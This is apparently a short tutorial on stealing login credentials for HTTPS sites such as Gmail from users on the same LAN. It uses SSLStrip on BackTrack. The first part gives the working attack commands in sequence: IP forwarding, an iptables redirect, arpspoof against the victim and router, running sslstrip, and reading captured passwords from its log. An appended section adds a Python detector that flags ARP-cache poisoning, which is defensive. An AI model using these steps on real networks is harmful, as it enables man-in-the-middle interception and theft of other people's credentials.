SSLStrip can be used to steal credentials for Gmail, Facebook… (any HTTPS site) from users on the same LAN. Backtrack comes with SSLStrip pre-installed.
The steps below explain how SSLStrip is used to steal the credentials.
Attacker: Backtrack 4 Linux machine
Victim: Windows XP machine
On the Backtrack 4 terminal:
- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
- arpspoof -i eth0 -t victimip routerip
In another terminal:
- sslstrip -l 1000
If you are using Backtrack 5, then do the following to start SSLStrip.
- Go to start->info gathering->web app tools->ssl analysis->sslstrip
- chmod +x sslstrip.py
- python sslstrip.py -l 1000
Now, on the Windows XP machine, open a browser (IE). Type gmail and press Ctrl+Enter.
Type the username and password to log in to Gmail.
By this time SSLStrip has captured the credentials and stored them in the sslstrip.log file. To view the log:
On the Backtrack terminal:
- cat sslstrip.log
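The arpspoof step above leaves a trace on the victim: its ARP cache maps the router's IP to the attacker's MAC address. The Python check below is an added example (not part of the original post) that parses Windows `arp -a` output and flags that condition; the sample tables, addresses and function names are constructed for illustration.

```python
import re

# One data row of Windows `arp -a` output: IP, dash-separated MAC, entry type.
ROW = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
                 r"((?:[0-9a-fA-F]{2}-){5}[0-9a-fA-F]{2})\s+(\w+)\s*$")

# Constructed sample tables (addresses are made up for this example).
CLEAN_SAMPLE = """
Interface: 192.168.1.20 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.50          00-aa-bb-cc-dd-ee     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""
# Same LAN while 192.168.1.50 answers ARP on behalf of the router (constructed).
POISONED_SAMPLE = CLEAN_SAMPLE.replace("00-11-22-33-44-55", "00-aa-bb-cc-dd-ee")

def parse_arp_table(text):
    """Return {ip: mac} for the dynamic unicast entries in `arp -a` output."""
    table = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # interface banner, column header, blank line
        ip, mac, kind = m.group(1), m.group(2).lower(), m.group(3).lower()
        # Static rows and broadcast/multicast MACs (low bit of first octet set)
        # legitimately repeat, so they are not evidence of spoofing.
        if kind == "dynamic" and not int(mac[:2], 16) & 1:
            table[ip] = mac
    return table

def find_poisoning(table, gateway_ip, known_gateway_mac=None):
    """Return findings (strings); an empty list means nothing suspicious."""
    findings = []
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        return findings  # gateway not in cache: nothing to compare
    known = known_gateway_mac.lower().replace(":", "-") if known_gateway_mac else None
    if known and gw_mac != known:
        findings.append(f"gateway {gateway_ip} is at {gw_mac}, expected {known}")
    # Heuristic: only fires if the spoofing host's real IP is also cached.
    sharers = sorted(ip for ip, mac in table.items() if mac == gw_mac and ip != gateway_ip)
    if sharers:
        findings.append(f"gateway MAC {gw_mac} also used by {', '.join(sharers)}")
    return findings

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN_SAMPLE), ("poisoned", POISONED_SAMPLE)):
        print(name, find_poisoning(parse_arp_table(sample), "192.168.1.1", "00:11:22:33:44:55"))
```

The baseline comparison is the reliable signal; record the router's MAC while the network is known to be clean and pass it as `known_gateway_mac`.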